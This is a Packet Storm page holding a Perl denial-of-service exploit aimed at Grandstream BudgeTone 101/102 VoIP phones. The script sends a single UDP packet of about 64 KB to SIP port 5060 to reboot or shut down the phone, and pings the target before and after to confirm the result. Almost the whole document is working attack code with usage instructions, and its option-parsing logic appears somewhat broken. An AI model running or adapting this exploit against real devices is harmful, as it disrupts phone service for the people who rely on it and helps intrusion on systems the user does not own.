Denial of service exploit for the Grandstream Budge Tone 101/102 VOIP phone that sends UDP packets larger than 65534 bytes in size to port 5060.
c0ade1d951f810b48782c25899321731bff97b1a0de4e2f6dffa87086b7601a8#!/usr/bin/perl
#
use IO::Socket;
use Term::ANSIColor;
############################ U S A G E ###################################
system ("clear");
print "\nGrandstream BT101/BT102 DoS\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";
if (!$ARGV[2]){
print qq~
Usage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}
<ip-addr> = ;-)
<udp-port> = 5060
-r = 'reboot' the Grandstream BT 101/102
-s = 'shutdown' the Grandstream BT 101/102
~; exit;}
################################## D E F I N I T I O N S####################
$victim = $ARGV[0];
$port = $ARGV[1];
$option = $ARGV[2];
if ( $option == 'r' || $option == 'R' )
{ $request= 'k'x65534;}
if ( $option == 's' || $option == 'S' )
{ $request= 'p'x65535;}
else
{ print "Wrong parameter - try it again";
exit;
}
# ping the remote device
print color 'bold blue';
print "\nping the remote device $victim\n";
print color 'reset';
system("ping -c 3 $victim");
print color 'bold red';
print "\n Wait ... \n\n\n";
print color 'reset';
$sox = IO::Socket::INET->new(Proto=>"udp",PeerPort=>"$port",PeerAddr=>"$victim");
print $sox $request;
sleep 1;
close $sox;
# ping the remote device
print color 'bold blue';
print "ping the remote device $victim again\n";
print color 'reset';
system("ping -c 3 $victim");
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed